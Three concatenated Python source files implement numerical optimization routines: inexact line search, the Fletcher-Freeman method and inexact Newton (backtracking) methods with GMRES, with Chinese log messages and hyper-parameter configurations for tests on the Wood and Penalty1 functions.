from goto import with_goto
import copy
import functions
import functools
def inexact_line_search(func, gfunc, X, d, hyper_parameters=None, rho=0.1, sigma=0.4, criterion='Armijo Goldstein', start=0, end=1e10, alpha0=1e-6, t=5, appendix=False):
    """Inexact line search under the Armijo-Goldstein / (strong) Wolfe-Powell rules.

    Args:
        func (callable): objective function.
        gfunc (callable): gradient of the objective.
        X (np.array): current point.
        d (np.array): descent direction.
        hyper_parameters (dict, optional): overrides rho, sigma, criterion
            and the initial step "alpha0".
        rho (float, optional): Armijo parameter in (0, 1/2). Defaults to 0.1.
        sigma (float, optional): Wolfe parameter in (rho, 1). Defaults to 0.4.
        criterion (str, optional): one of "Armijo Goldstein", "Wolfe Powell",
            "Strong Wolfe Powell". Defaults to "Armijo Goldstein".
        start (float, optional): step lower bound. Defaults to 0.
        end (float, optional): step upper bound. Defaults to 1e10.
        alpha0 (float, optional): initial step. Defaults to 1e-6.
        t (float, optional): extrapolation factor while no upper bound is set.
        appendix (bool, optional): print a summary when True.

    Returns:
        (alpha_star, func_k): accepted step and the number of func calls.
    """
    if hyper_parameters is not None:
        rho = hyper_parameters["rho"]
        sigma = hyper_parameters["sigma"]
        criterion = hyper_parameters["criterion"]
        alpha = hyper_parameters["alpha0"]
    else:
        alpha = alpha0
    # Loop-invariant quantities: f and g at the current point.
    func_k = 1
    f0 = func(X)
    gf0 = gfunc(X)
    gkdk = gf0.dot(d)  # directional derivative g_k^T d (must be a numpy dot)
    wolfe_bound = sigma * gkdk
    strong_wolfe_bound = sigma * abs(gkdk)
    iter_num = 0
    while True:
        func_k += 1
        trial = X + alpha * d
        f_alpha = func(trial)
        g_alpha = gfunc(trial)
        if abs(start - end) < 1e-15:
            # Bracket collapsed: accept the current step as-is.
            alpha_star, min_value = alpha, f_alpha
            break
        # Condition 1 (shared): Armijo sufficient decrease, rejects too-large steps.
        sufficient_decrease = f_alpha <= f0 + rho * gkdk * alpha
        # Condition 2 (per criterion): rejects too-small steps.
        gd = g_alpha.dot(d)
        if criterion == 'Armijo Goldstein':
            not_too_small = f_alpha >= f0 + (1 - rho) * gkdk * alpha
        elif criterion == 'Wolfe Powell':
            not_too_small = gd >= wolfe_bound
        elif criterion == 'Strong Wolfe Powell':
            not_too_small = abs(gd) <= strong_wolfe_bound
        else:
            not_too_small = True
        if not sufficient_decrease:
            # Too large: bisect toward start.
            end = alpha
            alpha = (start + end) / 2
        elif not not_too_small:
            # Too small: raise the lower bound; extrapolate while unbounded.
            start = alpha
            alpha = (start + end) / 2 if end < 1e10 else t * alpha
        else:
            alpha_star, min_value = alpha, f_alpha
            break
        iter_num += 1
    if appendix:
        print("方法:非精确线搜索;准则:%s\n" % criterion)
        print("初始步长:%.2f" % (alpha0))
        print("初始点函数值:%.2f" % (f0))
        print("停止步长:%.4f; 停止点函数值:%.4f; 迭代次数:%d" % (alpha_star, min_value, iter_num))
    return alpha_star, func_k
def test():
    """Smoke-test the inexact line search on the Wood function.

    BUG FIX: inexact_line_search returns the tuple (alpha_star, func_k);
    the original code bound the whole tuple to alpha_star, so
    `x0 + d0 * alpha_star` crashed with a broadcasting error.
    """
    x0 = np.array([-3, -1, -3, -1])
    d0 = np.array([2, 1, 2, 1])
    diff_wood_list, symbols_wood_list = functions.diff_wood_expression()
    g_wood_partial = functools.partial(functions.g_wood, diff_list=diff_wood_list, symbols_list=symbols_wood_list)
    alpha_star, func_k = inexact_line_search(functions.wood, g_wood_partial, x0, d0, appendix=True)
    print(functions.wood(x0 + d0 * alpha_star))
def main():
    # Script entry point: run the single smoke test.
    test()
if __name__ == "__main__":
    main()
--- FILE SEPARATOR ---
from goto import with_goto
import utils
import numpy as np
import functions
import functools
import Line_Search.exact_line_search as ELS
import Line_Search.inexact_line_search as ILS
from Line_Search.GLL import GLL_search
import logging
import time
import copy
logging.basicConfig(format='%(asctime)s,%(msecs)d %(levelname)-8s [%(filename)s:%(lineno)d] %(message)s',
datefmt='%d-%m-%Y:%H:%M:%S')
logger = logging.getLogger(__name__)
def descent_by_general_inverse(X, L, D, gfunc):
    """Method (b): descent direction through the generalized (pseudo-)inverse
    of D when D has non-positive eigenvalues.

    D comes from a BP / LDL^T factorization and is block diagonal with 1x1
    and 2x2 blocks.  D^+ is built by inverting only the positive eigenvalues
    of each block, then
        d = -L^{-T} D^+ L^{-1} g(X).

    Args:
        X (np.array): current point.
        L (np.array): unit lower-triangular factor of the factorization.
        D (np.array): block-diagonal factor (1x1 / 2x2 blocks).
        gfunc (callable): gradient of the objective.

    Returns:
        np.array of shape (n, 1): the descent direction.
    """
    n = len(D)
    D_plus = np.zeros((n, n))
    i = 0
    while i < n:
        if i < n - 1 and D[i + 1][i] != 0:  # 2x2 block
            # BUG FIX: eigenvectors are the COLUMNS of the matrix returned by
            # np.linalg.eig/eigh; the original code indexed rows, so the
            # positive part of the block was reconstructed incorrectly.
            # eigh is used because each block is symmetric.
            eigenvalue, eigenvector = np.linalg.eigh(D[i: i + 2, i: i + 2])
            for idx in np.where(eigenvalue > 0)[0]:
                v = eigenvector[:, idx]
                # Accumulate (1/lambda) * v v^T for every positive eigenvalue.
                D_plus[i: i + 2, i: i + 2] += np.outer(v, v) / eigenvalue[idx]
            i += 2
        else:  # 1x1 block: invert only if strictly positive
            D_plus[i][i] = 0 if D[i][i] <= 0 else 1 / D[i][i]
            i += 1
    L_inverse = np.linalg.inv(L)
    g = np.asarray(gfunc(X)).reshape(n, 1)
    descent = -(L_inverse.T @ D_plus @ L_inverse @ g)
    return np.array(descent)
@with_goto
def Fletcher_Freeman(X, func, gfunc, hess_func, hyper_parameters=None, search_mode="ELS", epsilon=1e-5, max_epoch=1000):
    """Fletcher-Freeman method for finding a local minimizer.

    Args:
        X (np.array): initial point.
        func (callable): objective function.
        gfunc (callable): gradient of the objective.
        hess_func (callable): Hessian of the objective.
        hyper_parameters (dict, optional): when given, overrides:
            search_mode (str, optional): line-search mode, one of
                ['ELS', 'ILS', 'GLL']. Defaults to 'ELS'.
            epsilon (float, optional): stop when the decrease of the function
                value is below epsilon. Defaults to 1e-5.
            max_epoch (int, optional): maximum iterations. Defaults to 1000.

    Returns:
        (X_new, func_X_new, k, function_k): minimizer found, its function
        value, iteration count and function-call count.
    """
    if hyper_parameters is not None:
        search_mode = hyper_parameters["search_mode"]
        epsilon = hyper_parameters["epsilon"]
        max_epoch = hyper_parameters["max_epoch"]
    k = 1
    function_k = 0
    func_values = [] # function value of every step; used by the GLL search
    mk = 0 # initial m(k) for the GLL search
    label .step2
    G = hess_func(X)
    function_k += 1
    F = func(X)
    func_values.append(F)
    L, D, y = utils.Bunch_Parlett(G)
    n = len(X)
    # Choose the descent direction d according to the signs of D's eigenvalues.
    eigenvalue, eigenvector = np.linalg.eig(D)
    # Case 1: some eigenvalues are negative.
    if np.any(eigenvalue < 0):
        logger.info("特征值中有负值")
        d = np.squeeze(descent_by_general_inverse(X, L, D, gfunc))
    elif np.any(eigenvalue == 0): # Case 2: non-negative with at least one zero.
        logger.info("特征值中既有正值又有零")
        d = descent_by_general_inverse(X, L, D, gfunc)
        if np.where(d != 0)[0].shape[0] == 0:
            G_modified = np.dot(np.dot(L, D), L.T)
            right_zero = np.zeros(n)
            # NOTE(review): np.linalg.solve(G, 0) returns the zero vector for
            # a nonsingular G, so this loop can never find a nonzero descent
            # direction; G_modified is computed but unused — it may have been
            # intended here instead of G.  Verify against the algorithm.
            descent_list = np.linalg.solve(G, right_zero)
            # descent_list = np.linalg.solve(G, right_zero)
            for descent in descent_list:
                if gfunc(X) @ descent < 0: # pick a d_k with g_k^T d_k < 0, excluding the zero vector
                    d = descent
                    break
    else:
        # Case 3: all eigenvalues are positive — plain Newton direction.
        logger.info("特征值全为正")
        G_modified = np.dot(np.dot(L, D), L.T)
        inv_hass = np.linalg.inv(G)
        # inv_hass = np.linalg.inv(G)
        d = -np.dot(inv_hass , gfunc(X))
    # With the descent direction chosen, the remaining steps match the GM
    # stabilized Newton method: line search, step, stop check.
    if search_mode == "ELS":
        logger.info("迭代第{iter}轮,当前函数调用次数{func_k},当前X取值为{X},下降方向为{d},当前函数值为{func_x}".format(iter=k,func_k=function_k,X=X,d=d,func_x=round(F, 8)))
        a, b, add_retreat_func = ELS.retreat_method(func, X, d, hyper_parameters=hyper_parameters["ELS"]["retreat_method"] if hyper_parameters is not None else None)
        alpha_star, add_golden_func = ELS.golden_method(func, X, d, a, b, hyper_parameters=hyper_parameters["ELS"]["golden_method"] if hyper_parameters is not None else None)
        add_func_k = add_retreat_func + add_golden_func
    elif search_mode == "ILS":
        logger.info("迭代第{iter}轮,当前函数调用次数{func_k},当前X取值为{X},下降方向为{d},当前函数值为{func_x}".format(iter=k,func_k=function_k,X=X,d=d,func_x=round(F, 8)))
        alpha_star, add_func_k = ILS.inexact_line_search(func, gfunc, X, d, hyper_parameters=hyper_parameters["ILS"] if hyper_parameters is not None else None)
    elif search_mode == "GLL":
        logger.info("迭代第{iter}轮,当前函数调用次数{func_k},当前X取值为{X},下降方向为{d},当前函数值为{func_x}".format(iter=k,func_k=function_k,X=X,d=d,func_x=round(F, 8)))
        alpha_star, add_func_k, mk = GLL_search(func, gfunc, X, d, func_values, mk, hyper_parameters=hyper_parameters["GLL"] if hyper_parameters is not None else None)
    else:
        raise ValueError("参数search_mode 必须从['ELS', 'ILS']当中选择")
    # logging.info("线搜索结束")
    X_new = X + d * alpha_star
    function_k = function_k + add_func_k + 1
    func_X_new = func(X_new)
    if abs(func_X_new - F) <= epsilon:
        logger.info("因为函数值下降在{epsilon}以内,{mode}的FF方法,迭代结束,迭代轮次{iter},函数调用次数{func_k},最终X={X},最终函数值={func_X_new}".format(epsilon=epsilon, mode=search_mode, iter=k, func_k=function_k,X=X,func_X_new=func_X_new))
        return X_new, func_X_new, k, function_k
    if k > max_epoch:
        logger.info("超过最大迭代次数:%d", max_epoch)
        return X_new, func_X_new, k, function_k
    X = X_new
    k += 1
    goto .step2
if __name__ == '__main__':
    # Smoke test: run the FF method on the Wood function (symbolic gradient
    # and Hessian built via the `functions` helpers); only the GLL-search
    # variant is currently enabled.
    x0 = np.array([-3, -1, -3, -1])
    d0 = np.array([2, 1, 2, 1])
    diff_wood_list, symbols_wood_list = functions.diff_wood_expression()
    g_wood_partial = functools.partial(functions.g_wood, diff_list=diff_wood_list, symbols_list=symbols_wood_list)
    hess_wood_lists, symbols_wood_list = functions.hess_wood_expression()
    G_wood_partial = functools.partial(functions.G_wood, G_lists=hess_wood_lists, symbols_list=symbols_wood_list)
    # logger.info("精确线搜索下的FF方法")
    # Fletcher_Freeman(x0, functions.wood, g_wood_partial, G_wood_partial, search_mode='ELS')
    # logger.info("非精确线搜索下的FF方法")
    # Fletcher_Freeman(x0, functions.wood, g_wood_partial, G_wood_partial, search_mode='ILS')
    logger.info("GLL线搜索下的FF方法")
    Fletcher_Freeman(x0, functions.wood, g_wood_partial, G_wood_partial, search_mode='GLL')
--- FILE SEPARATOR ---
import functions
import numpy as np
import math
import time
from goto import with_goto
import Line_Search.exact_line_search as ELS
import Line_Search.inexact_line_search as ILS
from Line_Search.GLL import GLL_search
import utils
import functools
import copy
from scipy.sparse.linalg import gmres
import logging
logging.basicConfig(format='%(asctime)s,%(msecs)d %(levelname)-8s [%(filename)s:%(lineno)d] %(message)s',
datefmt='%d-%m-%Y:%H:%M:%S')
logging.getLogger().setLevel(logging.DEBUG)
logger = logging.getLogger(__name__)
@with_goto
def inexact_newton_method(X, func, gfunc, hess_func, hyper_parameters=None, search_mode="ILS", eta_mode=1, safeguard=True, eta0=0.5, gamma=1, sigma=1.5, epsilon=1e-5, max_epoch=1000):
    """Minimize ``func`` with the inexact Newton method.

    Each iteration approximately solves the Newton system G_k d = -g_k with
    GMRES under a forcing term ``eta`` (with a direct-solve fallback), then
    takes a line-search step along d.

    Args:
        X (np.array): starting point.
        func (callable): objective function.
        gfunc (callable): gradient of the objective.
        hess_func (callable): Hessian of the objective.
        hyper_parameters (dict, optional): when given, overrides the keyword
            defaults below; keys used: "search_mode", "epsilon", "max_epoch"
            and the nested "INM" dict.
        search_mode (str): line-search mode, one of ['ELS', 'ILS', 'GLL'].
        eta_mode (int): rule for choosing the forcing term eta, 1 or 2.
        safeguard (bool): whether to apply the safeguard lower bound on eta.
        eta0 (float): initial value of eta.
        gamma (float): coefficient used by eta choice 2.
        sigma (float): exponent used by eta choice 2.
        epsilon (float): stop when ||g_k|| < epsilon * max(1, ||x_k||).
        max_epoch (int): maximum number of iterations.

    Returns:
        tuple: (X*, f(X*), iteration count, function-evaluation count,
        elapsed wall-clock seconds).
    """
    if hyper_parameters is not None:
        search_mode = hyper_parameters["search_mode"]
        epsilon = hyper_parameters["epsilon"]
        max_epoch = hyper_parameters["max_epoch"]
        eta_mode = hyper_parameters["INM"]["eta_mode"]
        eta0 = hyper_parameters["INM"]["eta0"]
        safeguard = hyper_parameters["INM"]["safeguard"]
        if eta_mode == 2:
            gamma = hyper_parameters["INM"]["gamma"]
            sigma = hyper_parameters["INM"]["sigma"]
    n = len(X)
    k = 1
    function_k = 0
    func_values = []  # function value of every step (used by the GLL search)
    mk = 0  # initial mk for the GLL search
    g_pre = None
    G_pre = None
    d_pre = None
    g = gfunc(X)
    G = hess_func(X)
    eta_pre = None
    # record the current function value
    F = func(X)
    function_k += 1
    func_values.append(F)
    start_time = time.time()
    use_gmres = True
    # compute the descent direction d_k: approximately solve G_k d = -g_k
    label .count_dk
    # choose the current forcing term eta
    if g_pre is None:
        eta = eta0
    else:
        if eta_mode == 1:
            # NOTE(review): d_pre is the unscaled search direction; choice 1 is
            # usually stated with the actual step alpha*d — confirm intended.
            eta = np.linalg.norm(g - g_pre - G_pre @ d_pre) / np.linalg.norm(g_pre)
        elif eta_mode == 2:
            eta = gamma * (np.linalg.norm(g) / np.linalg.norm(g_pre)) ** sigma
    # safeguard: keep eta from dropping too fast relative to the previous eta
    if eta_pre is not None and safeguard:
        if eta_mode == 1:
            if eta_pre ** ((1/math.sqrt(5))/2) > 0.1:
                eta = max(eta, eta_pre ** ((1/math.sqrt(5))/2) )
        elif eta_mode == 2:
            if gamma * eta_pre ** sigma > 0.1:
                eta = max(eta, gamma * eta_pre ** sigma)
    # solve for d_k iteratively with GMRES
    if use_gmres:
        logger.info("eta is {}".format(eta))
        gmres_result = gmres(G, -g, tol=eta)
        logger.info("gmers reslut is {}".format(gmres_result))
        d = gmres_result[0]
    # fall back to a direct solve when GMRES returns the zero direction
    if np.all(d == 0) or use_gmres == False:
        inv_hass = np.linalg.inv(G)
        d = -np.dot(inv_hass , g)
        use_gmres = False
    before_LS_time = time.time()
    # with the direction in hand, the remaining steps match the other methods
    if search_mode == "ELS":
        logger.info("迭代第{iter}轮,当前函数调用次数{func_k},当前用时{time},当前X取值为{X},当前g的取值为{g}, 下降方向为{d},当前函数值为{func_x}".format(iter=k,func_k=function_k,time=before_LS_time-start_time,X=X, g=g, d=d,func_x=round(F, 8)))
        a, b, add_retreat_func = ELS.retreat_method(func, X, d, hyper_parameters=hyper_parameters["ELS"]["retreat_method"] if hyper_parameters is not None else None)
        alpha_star, add_golden_func = ELS.golden_method(func, X, d, a, b, hyper_parameters=hyper_parameters["ELS"]["golden_method"] if hyper_parameters is not None else None)
        add_func_k = add_retreat_func + add_golden_func
    elif search_mode == "ILS":
        logger.info("迭代第{iter}轮,当前函数调用次数{func_k},当前用时{time},当前X取值为{X},当前g的取值为{g}, 下降方向为{d},当前函数值为{func_x}".format(iter=k,func_k=function_k,time=before_LS_time-start_time,X=X, g=g, d=d,func_x=round(F, 8)))
        alpha_star, add_func_k = ILS.inexact_line_search(func, gfunc, X, d, hyper_parameters=hyper_parameters["ILS"] if hyper_parameters is not None else None)
    elif search_mode == "GLL":
        logger.info("迭代第{iter}轮,当前函数调用次数{func_k},当前用时{time},当前X取值为{X},当前g的取值为{g}, 下降方向为{d},当前函数值为{func_x}".format(iter=k,func_k=function_k,time=before_LS_time-start_time,X=X, g=g, d=d,func_x=round(F, 8)))
        alpha_star, add_func_k, mk = GLL_search(func, gfunc, X, d, func_values, mk, hyper_parameters=hyper_parameters["GLL"] if hyper_parameters is not None else None)
    # update the iterate
    logger.info("当前更新的步长为{}".format(alpha_star))
    X_new = X + d * alpha_star
    function_k = function_k + add_func_k + 1
    func_X_new = func(X_new)
    func_values.append(func_X_new)
    g_pre = g
    G_pre = G
    d_pre = d
    # BUGFIX: remember eta so the safeguard can use it next iteration (it was never updated)
    eta_pre = eta
    g = gfunc(X_new)
    # BUGFIX: evaluate the Hessian at the new iterate (was hess_func(X), one point behind g)
    G = hess_func(X_new)
    logger.info("g is {}".format(g))
    logger.info("g的范数为{g},epsilon * max(1, |x_k|)为{xk}".format(g = np.linalg.norm(g), xk = epsilon * max(1, np.linalg.norm(X_new))))
    # stopping test; note g may fail to decrease due to floating-point limits
    if np.linalg.norm(g) < epsilon * max(1, np.linalg.norm(X_new)):
        end_time = time.time()
        logger.info("因为满足终止条件,{mode}的非精确牛顿法,迭代结束,迭代轮次{iter},函数调用次数{func_k},最终用时{time},最终X={X},最终函数值={func_X_new}".format(mode=search_mode, iter=k, func_k=function_k, time=end_time-start_time, X=X,func_X_new=func_X_new))
        return X_new, func_X_new, k, function_k, end_time-start_time
    if k > max_epoch:
        end_time = time.time()
        logger.info("超过最大迭代次数,{mode}的非精确牛顿法,迭代结束,迭代轮次{iter},函数调用次数{func_k},最终用时{time},最终X={X},最终函数值={func_X_new}".format(mode=search_mode, iter=k, func_k=function_k, time=end_time-start_time, X=X,func_X_new=func_X_new))
        return X_new, func_X_new, k, function_k, end_time-start_time
    X = X_new
    F = func_X_new
    k += 1
    goto .count_dk
@with_goto
def INBM(X, func, gfunc, hess_func, hyper_parameters=None, search_mode="ILS", eta_mode=1, safeguard=True, eta0=0.5, gamma=1, sigma=1.5, t=1e-4, eta_max=0.9, theta_min=0.1, theta_max=0.5, epsilon=1e-5, max_epoch=1000):
    """Inexact Newton backtracking method (INBM).

    Like ``inexact_newton_method`` but, after the GMRES solve, the direction
    is backtracked (scaled by theta chosen via quadratic interpolation) until
    the residual-reduction condition ||g(X+d)|| <= (1 - t(1-eta)) ||g(X)||
    holds, before the usual line search.

    Args:
        X (np.array): starting point.
        func (callable): objective function.
        gfunc (callable): gradient of the objective.
        hess_func (callable): Hessian of the objective.
        hyper_parameters (dict, optional): when given, overrides the keyword
            defaults below; keys used: "search_mode", "epsilon", "max_epoch"
            and the nested "INBM" dict.
        search_mode (str): line-search mode, one of ['ELS', 'ILS', 'GLL'].
        eta_mode (int): rule for choosing the forcing term eta (0 keeps eta0).
        safeguard (bool): whether to apply the safeguard lower bound on eta.
        eta0 (float): initial value of eta.
        gamma (float): coefficient used by eta choice 2.
        sigma (float): exponent used by eta choice 2.
        t (float): constant of the residual-reduction (backtracking) condition.
        eta_max (float): upper bound on eta.
        theta_min (float): lower bound for the backtracking factor theta.
        theta_max (float): upper bound for the backtracking factor theta.
        epsilon (float): stop when ||g_k|| < epsilon * max(1, ||x_k||).
        max_epoch (int): maximum number of iterations.

    Returns:
        tuple: (X*, f(X*), iteration count, function-evaluation count,
        elapsed wall-clock seconds).
    """
    if hyper_parameters is not None:
        search_mode = hyper_parameters["search_mode"]
        epsilon = hyper_parameters["epsilon"]
        max_epoch = hyper_parameters["max_epoch"]
        eta_mode = hyper_parameters["INBM"]["eta_mode"]
        eta0 = hyper_parameters["INBM"]["eta0"]
        safeguard = hyper_parameters["INBM"]["safeguard"]
        t = hyper_parameters["INBM"]["t"]
        eta_max = hyper_parameters["INBM"]["eta_max"]
        theta_min = hyper_parameters["INBM"]["theta_min"]
        theta_max = hyper_parameters["INBM"]["theta_max"]
        if eta_mode == 2:
            gamma = hyper_parameters["INBM"]["gamma"]
            sigma = hyper_parameters["INBM"]["sigma"]
    n = len(X)
    k = 1
    function_k = 0
    func_values = []  # function value of every step (used by the GLL search)
    mk = 0  # initial mk for the GLL search
    g_pre = None
    G_pre = None
    d_pre = None
    g = gfunc(X)
    G = hess_func(X)
    eta_pre = None
    # record the current function value
    F = func(X)
    function_k += 1
    func_values.append(F)
    start_time = time.time()
    use_gmres = True
    # compute the descent direction d_k: approximately solve G_k d = -g_k
    label .count_dk
    # choose the current forcing term eta
    if g_pre is None:
        eta = eta0
    else:
        if eta_mode == 1:
            eta = np.linalg.norm(g - g_pre - G_pre @ d_pre) / np.linalg.norm(g_pre)
        elif eta_mode == 2:
            eta = gamma * (np.linalg.norm(g) / np.linalg.norm(g_pre)) ** sigma
        elif eta_mode == 0:
            eta = eta0
    # safeguard: keep eta from dropping too fast relative to the previous eta
    if eta_pre is not None and safeguard:
        if eta_mode == 1:
            if eta_pre ** ((1/math.sqrt(5))/2) > 0.1:
                eta = max(eta, eta_pre ** ((1/math.sqrt(5))/2) )
        elif eta_mode == 2:
            if gamma * eta_pre ** sigma > 0.1:
                eta = max(eta, gamma * eta_pre ** sigma)
    # clamp eta, then solve for d_k iteratively with GMRES
    eta = min(eta, eta_max)
    if use_gmres:
        logger.info("eta is {}".format(eta))
        gmres_result = gmres(G, -g, tol=eta)
        logger.info("gmers reslut is {}".format(gmres_result))
        d = gmres_result[0]
    # fall back to a direct solve when GMRES returns the zero direction
    if np.all(d == 0) or use_gmres == False:
        inv_hass = np.linalg.inv(G)
        d = -np.dot(inv_hass , g)
        use_gmres = False
    # backtracking loop: shrink d until the residual-reduction condition holds
    while np.linalg.norm(gfunc(X + d)) > (1 - t * (1 - eta)) * np.linalg.norm(gfunc(X)):
        denominator = (F ** 2 - func(X + d) ** 2 + 2 * F * (g @ d))
        # guard against division by (near) zero: force theta out of range so the
        # midpoint fallback below is taken
        if abs(denominator) < 1e-20:
            theta = 1
        else:
            theta = (F * (g @ d)) / denominator
        # if the interpolated theta falls outside [theta_min, theta_max], use the midpoint
        if theta < theta_min or theta > theta_max:
            theta = (theta_min + theta_max) / 2
        d = theta * d
        eta = 1 - theta * (1 - eta)
    before_LS_time = time.time()
    # with the direction in hand, the remaining steps match the other methods
    if search_mode == "ELS":
        logger.info("迭代第{iter}轮,当前函数调用次数{func_k},当前用时{time},当前X取值为{X},当前g的取值为{g}, 下降方向为{d},当前函数值为{func_x}".format(iter=k,func_k=function_k,time=before_LS_time-start_time,X=X, g=g, d=d,func_x=round(F, 8)))
        a, b, add_retreat_func = ELS.retreat_method(func, X, d, hyper_parameters=hyper_parameters["ELS"]["retreat_method"] if hyper_parameters is not None else None)
        alpha_star, add_golden_func = ELS.golden_method(func, X, d, a, b, hyper_parameters=hyper_parameters["ELS"]["golden_method"] if hyper_parameters is not None else None)
        add_func_k = add_retreat_func + add_golden_func
    elif search_mode == "ILS":
        logger.info("迭代第{iter}轮,当前函数调用次数{func_k},当前用时{time},当前X取值为{X},当前g的取值为{g}, 下降方向为{d},当前函数值为{func_x}".format(iter=k,func_k=function_k,time=before_LS_time-start_time,X=X, g=g, d=d,func_x=round(F, 8)))
        alpha_star, add_func_k = ILS.inexact_line_search(func, gfunc, X, d, hyper_parameters=hyper_parameters["ILS"] if hyper_parameters is not None else None)
    elif search_mode == "GLL":
        logger.info("迭代第{iter}轮,当前函数调用次数{func_k},当前用时{time},当前X取值为{X},当前g的取值为{g}, 下降方向为{d},当前函数值为{func_x}".format(iter=k,func_k=function_k,time=before_LS_time-start_time,X=X, g=g, d=d,func_x=round(F, 8)))
        alpha_star, add_func_k, mk = GLL_search(func, gfunc, X, d, func_values, mk, hyper_parameters=hyper_parameters["GLL"] if hyper_parameters is not None else None)
    # update the iterate
    logger.info("当前更新的步长为{}".format(alpha_star))
    X_new = X + d * alpha_star
    function_k = function_k + add_func_k + 1
    func_X_new = func(X_new)
    func_values.append(func_X_new)
    g_pre = g
    G_pre = G
    d_pre = d
    # BUGFIX: remember eta so the safeguard can use it next iteration (it was never updated)
    eta_pre = eta
    g = gfunc(X_new)
    # BUGFIX: evaluate the Hessian at the new iterate (was hess_func(X), one point behind g)
    G = hess_func(X_new)
    logger.info("g is {}".format(g))
    logger.info("g的范数为{g},epsilon * max(1, |x_k|)为{xk}".format(g = np.linalg.norm(g), xk = epsilon * max(1, np.linalg.norm(X_new))))
    # stopping test; note g may fail to decrease due to floating-point limits
    if np.linalg.norm(g) < epsilon * max(1, np.linalg.norm(X_new)):
        end_time = time.time()
        logger.info("因为满足终止条件,{mode}的非精确牛顿法,迭代结束,迭代轮次{iter},函数调用次数{func_k},最终用时{time},最终X={X},最终函数值={func_X_new}".format(mode=search_mode, iter=k, func_k=function_k, time=end_time-start_time, X=X,func_X_new=func_X_new))
        return X_new, func_X_new, k, function_k, end_time-start_time
    if k > max_epoch:
        end_time = time.time()
        logger.info("超过最大迭代次数,{mode}的非精确牛顿法,迭代结束,迭代轮次{iter},函数调用次数{func_k},最终用时{time},最终X={X},最终函数值={func_X_new}".format(mode=search_mode, iter=k, func_k=function_k, time=end_time-start_time, X=X,func_X_new=func_X_new))
        return X_new, func_X_new, k, function_k, end_time-start_time
    X = X_new
    F = func_X_new
    k += 1
    goto .count_dk
if __name__ == '__main__':
    # Acceptance criteria available to the inexact line search (ILS)
    CRITERION = ["Armijo Goldstein", "Wolfe Powell", "Strong Wolfe Powell"]
    ILS_criterion = CRITERION[0]
    # Hyper-parameter bundles: one dict per (line-search, method) combination.
    # Exact line search (ELS) + inexact Newton method (INM)
    ELS_INM_hyper_parameters = {
        "ELS": {
            "retreat_method": {
                "a0" : 1,
                "r": 1e-6,
                "t": 1.5,
            },
            "golden_method": {
                "epsilon": 1e-6,
            }
        },
        "INM": {
            "eta_mode": 1,
            "eta0": 0.5,
            "safeguard" : True,
            "gamma" : 0.9,
            "sigma" : (1 + math.sqrt(5)) / 2,
        },
        "modified_Cholesky": {
            "u": 1e-50,
        },
        "search_mode": "ELS",
        "epsilon": 1e-5,
        "max_epoch": 10000,
    }
    # Inexact line search (ILS) + INM
    ILS_INM_hyper_parameters = {
        "ILS": {
            "rho": 0.3,
            "sigma": 0.5,
            "t": 1.5,
            "alpha0": 1,
            "criterion": ILS_criterion
        },
        "GM_newton": {
            "zeta": 1e-8,
        },
        "modified_Cholesky": {
            "u": 1e-50,
        },
        "INM": {
            "eta_mode": 1,
            "eta0": 0.1,
            "safeguard" : True,
            "gamma" : 0.9,
            "sigma" : (1 + math.sqrt(5)) / 2,
        },
        "search_mode": "ILS",
        "epsilon": 1e-5,
        "max_epoch": 10000,
    }
    # GLL nonmonotone line search + INM
    GLL_INM_hyper_parameters = {
        "GLL": {
            "rho": 0.25,
            "sigma": 0.4,
            "M": 5,
            "a": 10,
        },
        "modified_Cholesky": {
            "u": 1e-50,
        },
        "INM": {
            "eta_mode": 1,
            "eta0": 1e-6,
            "safeguard" : False,
            "gamma" : 0.9,
            "sigma" : (1 + math.sqrt(5)) / 2,
        },
        "search_mode": "GLL",
        "epsilon": 1e-5,
        "max_epoch": 10000,
    }
    # ELS + inexact Newton backtracking method (INBM)
    ELS_INBM_hyper_parameters = {
        "ELS": {
            "retreat_method": {
                "a0" : 1,
                "r": 1e-8,
                "t": 1.5,
            },
            "golden_method": {
                "epsilon": 1e-8,
            }
        },
        "INBM": {
            "eta_mode": 1,
            "eta0": 0.5,
            "safeguard" : True,
            "gamma" : 0.9,
            "sigma" : (1 + math.sqrt(5)) / 2,
            "t" : 1e-4,
            "eta_max" : 0.9,
            "theta_min" : 0.1,
            "theta_max": 0.5,
        },
        "modified_Cholesky": {
            "u": 1e-50,
        },
        "search_mode": "ELS",
        "epsilon": 1e-5,
        "max_epoch": 10000,
    }
    # ILS + INBM
    ILS_INBM_hyper_parameters = {
        "ILS": {
            "rho": 0.25,
            "sigma": 0.33,
            "t": 1.5,
            "alpha0": 1,
            "criterion": ILS_criterion
        },
        "GM_newton": {
            "zeta": 1e-8,
        },
        "modified_Cholesky": {
            "u": 1e-50,
        },
        "INBM": {
            "eta_mode": 1,
            "eta0": 0.1,
            "safeguard" : True,
            "gamma" : 0.9,
            "sigma" : (1 + math.sqrt(5)) / 2,
            "t" : 1e-4,
            "eta_max" : 0.9,
            "theta_min" : 0.1,
            "theta_max": 0.5,
        },
        "search_mode": "ILS",
        "epsilon": 1e-5,
        "max_epoch": 10000,
    }
    # GLL + INBM
    GLL_INBM_hyper_parameters = {
        "GLL": {
            "rho": 0.25,
            "sigma": 0.4,
            "M": 5,
            "a": 1,
        },
        "modified_Cholesky": {
            "u": 1e-50,
        },
        "INBM": {
            "eta_mode": 1,
            "eta0": 0.5,
            "safeguard" : True,
            "gamma" : 0.9,
            "sigma" : (1 + math.sqrt(5)) / 2,
            "t" : 1e-4,
            "eta_max" : 0.9,
            "theta_min" : 0.1,
            "theta_max": 0.5,
        },
        "search_mode": "GLL",
        "epsilon": 1e-8,
        "max_epoch": 10000,
    }
    # Problem dimension; the loop allows sweeping several sizes if desired
    N = 1000
    for n in [N]:
        # logger.info("Penalty1 函数")
        # x0 = np.array(range(1, n + 1))
        # penalty1 = functions.Penalty1(n)
        # ILS_INM_hyper_parameters["INM"]["eta_mode"] = 1
        # logger.info("非精确线搜索下的INM法")
        # X_star, func_X_star, iter_num, function_num, cpu_time = inexact_newton_method(x0, penalty1.func, penalty1.gfunc, penalty1.hess_func, hyper_parameters=ILS_INM_hyper_parameters)
        # logger.info("非精确牛顿法 & 选择1 & {} & {} & {} & {} & 是 \\\\".format(round(func_X_star, 5), iter_num, function_num, round(cpu_time, 2)))
        # ILS_INM_hyper_parameters["INM"]["eta_mode"] = 2
        # logger.info("非精确线搜索下的INM法")
        # X_star, func_X_star, iter_num, function_num, cpu_time = inexact_newton_method(x0, penalty1.func, penalty1.gfunc, penalty1.hess_func, hyper_parameters=ILS_INM_hyper_parameters)
